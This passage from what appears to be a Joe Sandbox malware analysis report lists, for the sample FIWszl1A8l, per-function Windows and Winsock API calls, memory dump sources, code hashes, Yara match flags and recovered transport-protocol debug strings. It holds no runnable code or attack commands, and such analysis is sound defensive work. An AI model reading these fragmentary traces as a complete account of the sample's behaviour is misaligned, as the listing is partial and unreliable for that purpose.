                                                                                                  • ResetEvent.KERNEL32(?), ref: 009744DC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Event$Reset$ExchangeInterlocked$CloseCurrentObjectSingleThreadTimeWaitclosesocketsendshutdowntime
                                                                                                  • String ID:
                                                                                                  • API String ID: 542259498-0
                                                                                                  • Opcode ID: c2920721286019c30cea39f657c44ba1db92b0625bcd1e7e263872539399072d
                                                                                                  • Instruction ID: 29ddb0552e88844fa1182d9db831dfdee810ab9da1033e446a8ee99c7b5c63a8
                                                                                                  • Opcode Fuzzy Hash: c2920721286019c30cea39f657c44ba1db92b0625bcd1e7e263872539399072d
                                                                                                  • Instruction Fuzzy Hash: A0218D76614B04ABC630EF79EC85B97B3E8FF89710F104A1EF58EC7250D671A8049BA1
                                                                                                  APIs
                                                                                                  • SetLastError.KERNEL32(0000139F,?), ref: 02D04E99
                                                                                                  • TryEnterCriticalSection.KERNEL32(?,?), ref: 02D04EB8
                                                                                                  • TryEnterCriticalSection.KERNEL32(?), ref: 02D04EC2
                                                                                                  • SetLastError.KERNEL32(0000139F), ref: 02D04ED9
                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 02D04EE2
                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 02D04EE9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$EnterErrorLastLeave
                                                                                                  • String ID:
                                                                                                  • API String ID: 4082018349-0
                                                                                                  • Opcode ID: 010915a580e305948dcb9d668baaf3da55f02a62f5b2bbc56e75dd5b43b5eeec
                                                                                                  • Instruction ID: 8cc82cb0359103dc40fe95e782dce091358f609e624432ed6176212368492f5d
                                                                                                  • Opcode Fuzzy Hash: 010915a580e305948dcb9d668baaf3da55f02a62f5b2bbc56e75dd5b43b5eeec
                                                                                                  • Instruction Fuzzy Hash: 121163326043048BD330EA69EC88A6BB7E8EF58325B00092EFA55C3690DA71ED14C6A5
                                                                                                  APIs
                                                                                                  • SetLastError.KERNEL32(0000139F,?), ref: 00974E79
                                                                                                  • TryEnterCriticalSection.KERNEL32(?,?), ref: 00974E98
                                                                                                  • TryEnterCriticalSection.KERNEL32(?), ref: 00974EA2
                                                                                                  • SetLastError.KERNEL32(0000139F), ref: 00974EB9
                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 00974EC2
                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 00974EC9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$EnterErrorLastLeave
                                                                                                  • String ID:
                                                                                                  • API String ID: 4082018349-0
                                                                                                  • Opcode ID: f66bd2e2bddfd49811552c3af46a927edf0315d36b8eba95cbe3bb13c6750c08
                                                                                                  • Instruction ID: 37eade8e265418cd52d45207278730e4e6871349be14f1e90f3aadfa78aac080
                                                                                                  • Opcode Fuzzy Hash: f66bd2e2bddfd49811552c3af46a927edf0315d36b8eba95cbe3bb13c6750c08
                                                                                                  • Instruction Fuzzy Hash: 101160336147048BC320EF79AC85A6BB3ECFF88721B404A2AE609C6651DB61D804C7A5
                                                                                                  APIs
                                                                                                  • SetLastError.KERNEL32(0000007F), ref: 02D0DD32
                                                                                                  • SetLastError.KERNEL32(0000007F), ref: 02D0DE35
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast
                                                                                                  • String ID: Main
                                                                                                  • API String ID: 1452528299-521822810
                                                                                                  • Opcode ID: 78449a350d230b83027ff442ef3032615b06031102b27c43f2f9be1bd9b21021
                                                                                                  • Instruction ID: a3b9b58bbd22a4d1dac6eebedf142081fcd615de104cacd9e5e21e3ebad453fb
                                                                                                  • Opcode Fuzzy Hash: 78449a350d230b83027ff442ef3032615b06031102b27c43f2f9be1bd9b21021
                                                                                                  • Instruction Fuzzy Hash: 5741E231A403059FE720DF98D8C0B6AB3E6FF64314F0445AAE8458B7A1E771ED45CB90
                                                                                                  APIs
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 02D03F65
                                                                                                  • SetLastError.KERNEL32(0000139F,?,76F8DFA0,02D03648), ref: 02D04054
                                                                                                    • Part of subcall function 02D02BC0: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02D02BD6
                                                                                                    • Part of subcall function 02D02BC0: SwitchToThread.KERNEL32 ref: 02D02BEA
                                                                                                  • send.WS2_32(?,02D249C0,00000010,00000000), ref: 02D03FC6
                                                                                                  • SetEvent.KERNEL32(?), ref: 02D03FE9
                                                                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 02D03FF5
                                                                                                  • WSACloseEvent.WS2_32(?), ref: 02D04003
                                                                                                  • shutdown.WS2_32(?,00000001), ref: 02D0401B
                                                                                                  • closesocket.WS2_32(?), ref: 02D04025
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: EventExchangeInterlockedThread$CloseCompareCurrentErrorLastSwitchclosesocketsendshutdown
                                                                                                  • String ID:
                                                                                                  • API String ID: 3254528666-0
                                                                                                  • Opcode ID: 68b6ccf07495d735ef62d0cfd2cb988c900348870cb6779beeab8f50f4101102
                                                                                                  • Instruction ID: 2a845df58b2d69ca6b343b88d7dd8d199c0569e1b9eaef72e7872d4a81cb4508
                                                                                                  • Opcode Fuzzy Hash: 68b6ccf07495d735ef62d0cfd2cb988c900348870cb6779beeab8f50f4101102
                                                                                                  • Instruction Fuzzy Hash: 3A2144706407009BD3309B28D88CB5BB7B9BB94714F104E0CFA8296BE0C7B6E849CB50
                                                                                                  APIs
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00973F65
                                                                                                  • SetLastError.KERNEL32(0000139F,?,76F8DFA0,00973648), ref: 00974054
                                                                                                    • Part of subcall function 00972B80: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 00972B96
                                                                                                    • Part of subcall function 00972B80: SwitchToThread.KERNEL32 ref: 00972BAA
                                                                                                  • send.WS2_32(?,00987440,00000010,00000000), ref: 00973FC6
                                                                                                  • SetEvent.KERNEL32(?), ref: 00973FE9
                                                                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 00973FF5
                                                                                                  • WSACloseEvent.WS2_32(?), ref: 00974003
                                                                                                  • shutdown.WS2_32(?,00000001), ref: 0097401B
                                                                                                  • closesocket.WS2_32(?), ref: 00974025
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: EventExchangeInterlockedThread$CloseCompareCurrentErrorLastSwitchclosesocketsendshutdown
                                                                                                  • String ID:
                                                                                                  • API String ID: 3254528666-0
                                                                                                  • Opcode ID: 96ddbd3c41ff4dd121916df3f772ee3965a605c63939e8a8e5f01271d0108a41
                                                                                                  • Instruction ID: 273a6098549205ac62a508bfd3fd6f97c72dc5a844e40d6793e38066b5f74a51
                                                                                                  • Opcode Fuzzy Hash: 96ddbd3c41ff4dd121916df3f772ee3965a605c63939e8a8e5f01271d0108a41
                                                                                                  • Instruction Fuzzy Hash: 36212A72214B009BE3309F79D888B5BB7F9BB84714F14891CF28A9B791C7B5E845DB90
                                                                                                  APIs
                                                                                                  • EnterCriticalSection.KERNEL32(?,?,00000000,02D04039,?,76F8DFA0,02D03648), ref: 02D04074
                                                                                                  • ResetEvent.KERNEL32(?,?,00000000,02D04039,?,76F8DFA0,02D03648), ref: 02D04087
                                                                                                  • ResetEvent.KERNEL32(?,?,00000000,02D04039,?,76F8DFA0,02D03648), ref: 02D04090
                                                                                                  • ResetEvent.KERNEL32(?,?,00000000,02D04039,?,76F8DFA0,02D03648), ref: 02D04099
                                                                                                    • Part of subcall function 02D01350: HeapFree.KERNEL32(?,00000000,?,?,?,02D040A6,?,00000000,02D04039,?,76F8DFA0,02D03648), ref: 02D01390
                                                                                                    • Part of subcall function 02D01420: HeapFree.KERNEL32(?,00000000,?,?,?,02D040B1,?,00000000,02D04039,?,76F8DFA0,02D03648), ref: 02D0143D
                                                                                                    • Part of subcall function 02D01420: _free.LIBCMT ref: 02D01459
                                                                                                  • HeapDestroy.KERNEL32(?,?,00000000,02D04039,?,76F8DFA0,02D03648), ref: 02D040B9
                                                                                                  • HeapCreate.KERNEL32(?,?,?,?,00000000,02D04039,?,76F8DFA0,02D03648), ref: 02D040D4
                                                                                                  • SetEvent.KERNEL32(?,?,00000000,02D04039,?,76F8DFA0,02D03648), ref: 02D04150
                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,00000000,02D04039,?,76F8DFA0,02D03648), ref: 02D04157
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: EventHeap$Reset$CriticalFreeSection$CreateDestroyEnterLeave_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 1219087420-0
                                                                                                  • Opcode ID: cad0a95d1ef60a3da59276dece35a5525002768d6c4a4ad6dab07df7364b4e9a
                                                                                                  • Instruction ID: a91e790f62a304a51b29a78d29c348de201780a659cc9bb5b27c28f6087a8ac6
                                                                                                  • Opcode Fuzzy Hash: cad0a95d1ef60a3da59276dece35a5525002768d6c4a4ad6dab07df7364b4e9a
                                                                                                  • Instruction Fuzzy Hash: 7B314870600A02AFD705DB34D898B96F7A9FF48310F148649E5298B3A0CB35BD25CFE0
                                                                                                  APIs
                                                                                                  • EnterCriticalSection.KERNEL32(?,?,00000000,00974039,?,76F8DFA0,00973648), ref: 00974074
                                                                                                  • ResetEvent.KERNEL32(?,?,00000000,00974039,?,76F8DFA0,00973648), ref: 00974087
                                                                                                  • ResetEvent.KERNEL32(?,?,00000000,00974039,?,76F8DFA0,00973648), ref: 00974090
                                                                                                  • ResetEvent.KERNEL32(?,?,00000000,00974039,?,76F8DFA0,00973648), ref: 00974099
                                                                                                    • Part of subcall function 00971350: HeapFree.KERNEL32(?,00000000,?,?,?,009740A6,?,00000000,00974039,?,76F8DFA0,00973648), ref: 00971390
                                                                                                    • Part of subcall function 00971420: HeapFree.KERNEL32(?,00000000,?,?,?,009740B1,?,00000000,00974039,?,76F8DFA0,00973648), ref: 0097143D
                                                                                                    • Part of subcall function 00971420: _free.LIBCMT ref: 00971459
                                                                                                  • HeapDestroy.KERNEL32(?,?,00000000,00974039,?,76F8DFA0,00973648), ref: 009740B9
                                                                                                  • HeapCreate.KERNEL32(?,?,?,?,00000000,00974039,?,76F8DFA0,00973648), ref: 009740D4
                                                                                                  • SetEvent.KERNEL32(?,?,00000000,00974039,?,76F8DFA0,00973648), ref: 00974150
                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,00000000,00974039,?,76F8DFA0,00973648), ref: 00974157
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: EventHeap$Reset$CriticalFreeSection$CreateDestroyEnterLeave_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 1219087420-0
                                                                                                  • Opcode ID: 42140521eb1b244646a8d0ccc883df17b844c60aee2d3c7402033c0517f1166f
                                                                                                  • Instruction ID: 85bfc01b4d3b2e7b890c30d730684d4bb2359703c7dea9dec6b70a1e13c01566
                                                                                                  • Opcode Fuzzy Hash: 42140521eb1b244646a8d0ccc883df17b844c60aee2d3c7402033c0517f1166f
                                                                                                  • Instruction Fuzzy Hash: 30312671614A02AFD705DF38C898BA6F7A8FF48310F158259E42D8B261DB35B855DFD0
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3787310787.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2820000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset$_malloc
                                                                                                  • String ID: ($6$gfff$gfff
                                                                                                  • API String ID: 3506388080-713438465
                                                                                                  • Opcode ID: 33456ebb2468a608b7ebcfb11b4406d8d4d11a59d9dc549158e7697d941f46b7
                                                                                                  • Instruction ID: 3b5d835bd765d56e6cf592d1355397787fe4e8827e522cd677ff564502ff9744
                                                                                                  • Opcode Fuzzy Hash: 33456ebb2468a608b7ebcfb11b4406d8d4d11a59d9dc549158e7697d941f46b7
                                                                                                  • Instruction Fuzzy Hash: ADD16AB9D01318AFDB10EFE9D885A9EBBB9FF48300F104129E505EB251D770A949CF91
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000003.3578743810.0000000003FA4000.00000004.00000020.00020000.00000000.sdmp, Offset: 03FA4000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_3_3fa4000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset$_malloc
                                                                                                  • String ID: ($6$gfff$gfff
                                                                                                  • API String ID: 3506388080-713438465
                                                                                                  • Opcode ID: 33456ebb2468a608b7ebcfb11b4406d8d4d11a59d9dc549158e7697d941f46b7
                                                                                                  • Instruction ID: f1f5f5a20108470a257b35bad09484f01d2ff920e3e4cd1f1889138f2820129a
                                                                                                  • Opcode Fuzzy Hash: 33456ebb2468a608b7ebcfb11b4406d8d4d11a59d9dc549158e7697d941f46b7
                                                                                                  • Instruction Fuzzy Hash: 75D16AB5E00318AFDB14DFE6DC85A9EFBB9FF48300F104529E905AB250D774A906CB91
                                                                                                  APIs
                                                                                                    • Part of subcall function 02D01610: __vswprintf.LIBCMT ref: 02D01646
                                                                                                  • _malloc.LIBCMT ref: 02D02330
                                                                                                    • Part of subcall function 02D0F673: __FF_MSGBANNER.LIBCMT ref: 02D0F68C
                                                                                                    • Part of subcall function 02D0F673: __NMSG_WRITE.LIBCMT ref: 02D0F693
                                                                                                    • Part of subcall function 02D0F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,02D14500,00000000,00000001,00000000,?,02D18DE6,00000018,02D26448,0000000C,02D18E76), ref: 02D0F6B8
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap__vswprintf_malloc
                                                                                                  • String ID: [RI] %d bytes$input ack: sn=%lu rtt=%ld rto=%ld$input probe$input psh: sn=%lu ts=%lu$input wins: %lu
                                                                                                  • API String ID: 3723585974-868042568
                                                                                                  • Opcode ID: 6356dffafb28c0114e622ca34e3ac6bfcf9b9770fd0b49f102fa3d41998e0e56
                                                                                                  • Instruction ID: ec5a8dfb876663898902a428f67b2effb32721c6659c993a5435761ab75e96fe
                                                                                                  • Opcode Fuzzy Hash: 6356dffafb28c0114e622ca34e3ac6bfcf9b9770fd0b49f102fa3d41998e0e56
                                                                                                  • Instruction Fuzzy Hash: 43B19271A012058BCF18CF68D8C87AA77A6FF48314F0845AEED499B3A6D771DD45CBA0
                                                                                                  APIs
                                                                                                    • Part of subcall function 00971610: __vswprintf.LIBCMT ref: 00971646
                                                                                                  • _malloc.LIBCMT ref: 00972330
                                                                                                    • Part of subcall function 00976E83: __FF_MSGBANNER.LIBCMT ref: 00976E9C
                                                                                                    • Part of subcall function 00976E83: __NMSG_WRITE.LIBCMT ref: 00976EA3
                                                                                                    • Part of subcall function 00976E83: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00979FB0,00000000,00000001,00000000,?,0097C0CF,00000018,00987C70,0000000C,0097C15F), ref: 00976EC8
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap__vswprintf_malloc
                                                                                                  • String ID: [RI] %d bytes$input ack: sn=%lu rtt=%ld rto=%ld$input probe$input psh: sn=%lu ts=%lu$input wins: %lu
                                                                                                  • API String ID: 3723585974-868042568
                                                                                                  • Opcode ID: f5680d2ab234ec779fb3ecac2229216d6ea76308415cf92665d41f39d30a22da
                                                                                                  • Instruction ID: 0cfcfed7bb3131a6f385dc3f8bbff999d4a344bb2f16ab5b6d14b7c858e1b750
                                                                                                  • Opcode Fuzzy Hash: f5680d2ab234ec779fb3ecac2229216d6ea76308415cf92665d41f39d30a22da
                                                                                                  • Instruction Fuzzy Hash: F7B1B072A142058BCF18DF68C8816AA7BA5BF84310F18C6AEED5D9B34AD735DD41CB90
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3787310787.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2820000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free$_malloc_memcpy_s
                                                                                                  • String ID: &
                                                                                                  • API String ID: 3027343870-3042966939
                                                                                                  • Opcode ID: bc8e6e112c061139a9596f3240d429f853c34e8cae2830de5eda6c03f43a5e61
                                                                                                  • Instruction ID: c27699e32ece3fd41e4f4617ab250bfeeb5a6d9de215913b2eddef09985ce8d8
                                                                                                  • Opcode Fuzzy Hash: bc8e6e112c061139a9596f3240d429f853c34e8cae2830de5eda6c03f43a5e61
                                                                                                  • Instruction Fuzzy Hash: 24C160F9A002299BDB24CF55CCC0BAAB7B5EB48304F1085A9D60DE7241D734AAC9CF65
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000003.3578743810.0000000003FA4000.00000004.00000020.00020000.00000000.sdmp, Offset: 03FA4000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_3_3fa4000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free$_malloc_memcpy_s
                                                                                                  • String ID: &
                                                                                                  • API String ID: 3027343870-3042966939
                                                                                                  • Opcode ID: bc8e6e112c061139a9596f3240d429f853c34e8cae2830de5eda6c03f43a5e61
                                                                                                  • Instruction ID: b8d6860581260cab3622db445917d2541ce4eeb66d6f251d09a6e3c457273b5d
                                                                                                  • Opcode Fuzzy Hash: bc8e6e112c061139a9596f3240d429f853c34e8cae2830de5eda6c03f43a5e61
                                                                                                  • Instruction Fuzzy Hash: F1C161F5A006199FDB20CF59CCC0BAAB7B9FF58304F1485ADE609A7201D774AA85CF64
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3782668054.0000000000920000.00000040.00001000.00020000.00000000.sdmp, Offset: 00920000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_920000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _free
                                                                                                  • String ID:
                                                                                                  • API String ID: 269201875-0
                                                                                                  • Opcode ID: 6beac5a88b0ea45cad91d564d56e12dc9c07d13e28084cda825bb388b8fc93ec
                                                                                                  • Instruction ID: abdcb4ea0625071b2abb29542a26e7761b3376ec9e834201dfd3bc615de3cfd1
                                                                                                  • Opcode Fuzzy Hash: 6beac5a88b0ea45cad91d564d56e12dc9c07d13e28084cda825bb388b8fc93ec
                                                                                                  • Instruction Fuzzy Hash: F6516E7AA00121DFD714DF58E4C0969BBB6FF9930872A80ADD50A5B325C732AD62CBD1
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3787310787.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2820000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free
                                                                                                  • String ID:
                                                                                                  • API String ID: 269201875-0
                                                                                                  • Opcode ID: e6d8705c8b2e074a591befd5bcc494b5e10d3bbe54f6e4032036311d5e0cbfeb
                                                                                                  • Instruction ID: 634943709e148f1a5f3721b32bcac08ad0f3db820ae8247e788b6e6f767f2ba2
                                                                                                  • Opcode Fuzzy Hash: e6d8705c8b2e074a591befd5bcc494b5e10d3bbe54f6e4032036311d5e0cbfeb
                                                                                                  • Instruction Fuzzy Hash: C8515FBE6001249FDB10DF48C5C88A5BBA6FF49208B2980A9D51DDB762C731BD86CF91
                                                                                                  APIs
                                                                                                  • _free.LIBCMT ref: 02D01878
                                                                                                  • _free.LIBCMT ref: 02D018B6
                                                                                                  • _free.LIBCMT ref: 02D018F5
                                                                                                  • _free.LIBCMT ref: 02D01935
                                                                                                  • _free.LIBCMT ref: 02D0195D
                                                                                                  • _free.LIBCMT ref: 02D01981
                                                                                                  • _free.LIBCMT ref: 02D019B9
                                                                                                    • Part of subcall function 02D0F639: RtlFreeHeap.NTDLL(00000000,00000000,?,02D13E4C,00000000,?,02D14500,00000000,00000001,00000000,?,02D18DE6,00000018,02D26448,0000000C,02D18E76), ref: 02D0F64F
                                                                                                    • Part of subcall function 02D0F639: GetLastError.KERNEL32(00000000,?,02D13E4C,00000000,?,02D14500,00000000,00000001,00000000,?,02D18DE6,00000018,02D26448,0000000C,02D18E76,00000000), ref: 02D0F661
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 776569668-0
                                                                                                  • Opcode ID: 874472731739e3ed89bd9027d864eadd54a143ebf7ad1ba4de8c5f14ab0f1c91
                                                                                                  • Instruction ID: f4ed7e12ecc5dd3dbc7b8f8031072183bb6c494600b263d983b3b01f7c205de1
                                                                                                  • Opcode Fuzzy Hash: 874472731739e3ed89bd9027d864eadd54a143ebf7ad1ba4de8c5f14ab0f1c91
                                                                                                  • Instruction Fuzzy Hash: 83513B72A001119FC714DF58D1C4AA9BBA6FF89318B2980ADC51E5B371C732ED42CF91
                                                                                                  APIs
                                                                                                  • _free.LIBCMT ref: 00971878
                                                                                                  • _free.LIBCMT ref: 009718B6
                                                                                                  • _free.LIBCMT ref: 009718F5
                                                                                                  • _free.LIBCMT ref: 00971935
                                                                                                  • _free.LIBCMT ref: 0097195D
                                                                                                  • _free.LIBCMT ref: 00971981
                                                                                                  • _free.LIBCMT ref: 009719B9
                                                                                                    • Part of subcall function 00976E49: HeapFree.KERNEL32(00000000,00000000,?,00979900,00000000,?,00979FB0,00000000,00000001,00000000,?,0097C0CF,00000018,00987C70,0000000C,0097C15F), ref: 00976E5F
                                                                                                    • Part of subcall function 00976E49: GetLastError.KERNEL32(00000000,?,00979900,00000000,?,00979FB0,00000000,00000001,00000000,?,0097C0CF,00000018,00987C70,0000000C,0097C15F,00000000), ref: 00976E71
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp
